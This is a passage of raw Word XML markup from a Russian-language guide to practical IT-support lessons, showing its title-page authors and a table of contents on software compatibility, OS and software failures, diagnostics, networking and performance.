      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>БГИТ</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="00F20E5F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пелипенко</w:t>
      </w:r>
      <w:r w:rsidR="00130203" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Татьяна Викторовна</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00130203" w:rsidRPr="00607C3B" w:rsidRDefault="00DB3939" w:rsidP="00F20E5F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пархоменко Светлана Петровна</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000641CB" w:rsidRPr="00607C3B" w:rsidRDefault="000641CB" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidRDefault="00E21192" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E21192" w:rsidRPr="00607C3B" w:rsidSect="00617AC0">
          <w:footerReference w:type="even" r:id="rId8"/>
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="first" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00086055" w:rsidRPr="00607C3B" w:rsidRDefault="00C75797" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="110"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc508023755"/>
      <w:bookmarkStart w:id="5" w:name="_Toc508023891"/>
      <w:bookmarkStart w:id="6" w:name="_Toc508184311"/>
      <w:bookmarkStart w:id="7" w:name="_Toc508184375"/>
      <w:bookmarkStart w:id="8" w:name="_Toc508186007"/>
      <w:bookmarkStart w:id="9" w:name="_Toc26277464"/>
      <w:bookmarkStart w:id="10" w:name="_Toc26277578"/>
      <w:bookmarkStart w:id="11" w:name="_Toc26278717"/>
      <w:r w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>СОДЕРЖАНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="0079051C" w:rsidRDefault="00B56D78">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00E115DD" w:rsidRPr="00607C3B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B56D78">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc26278718" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ВВЕДЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278718 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</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19" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ТЕМАТИЧЕСКИЙ ПЛАН ПРАКТИЧЕСКИХ ЗАНЯТИЙ</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278719 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</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0" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 1 Выявление проблем совместимости программного обеспечения системными средствами ОС</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278720 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</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1" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 2 Выбор методов выявления и устранения проблем совместимости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_Toc26278721 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</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2" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 3 Решение проблем совместимости отраслевого ПО с помощью технологии создания виртуальной машины</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278722 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</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3" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 4 Выявление и устранение проблем установки ПО отраслевой направленности</w:t>
        </w:r>
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>для обработки офисных документов, графики, видео, звука</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278723 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</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4" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 5 Решение проблем сбоя установки ОС</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278724 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</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5" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 6 Решение проблем сбоя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_Toc26278725 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</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6" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 7 Решение проблем сбоя программного обеспечения отраслевой направленности при установке приложений, написанных для более старых версий ОС Windows</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278726 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</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7" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 8 Выявление и решение проблем аппаратного сбоя. Диагностика оборудования средствами ОС</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278727 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>57</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8" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 9 Выявление и решение проблем входа в систему при использовании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_Toc26278728 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</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29" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 10 Выявление и устранение проблем сетевых подключений</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278729 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</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0" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 11 Выявление и решение проблем обновления программного обеспечения.</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278730 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>74</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1" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 12 Мониторинг производительности ОС и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_Toc26278731 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</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2" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 13 Решение проблем производительности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_Toc26278732 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>86</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3" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 14 Тестирование производительности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_Toc26278733 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</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4" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 15 Оптимизация производительности ОС и ПО</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278734 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</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5" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 16 Инсталляция, настройка и обновление программного продукта</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278735 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</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6" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 17 Мониторинг текущих характеристик отраслевого программного обеспечения</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278736 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>119</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7" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 18 Тестирование быстродействия аппаратного обеспечения</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278737 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>120</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8" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 19 Тестирование качества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_Toc26278738 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>132</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39" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 20 Обслуживание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_Toc26278739 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>138</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0" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 21 Обслуживание серверного программного обеспечения</w:t>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0079051C">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc26278740 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>149</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1" w:history="1">
        <w:r w:rsidR="0079051C" w:rsidRPr="00306289">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие № 22 Диагностика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_Toc26278741 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00621B4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>155</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2" w:history="1">
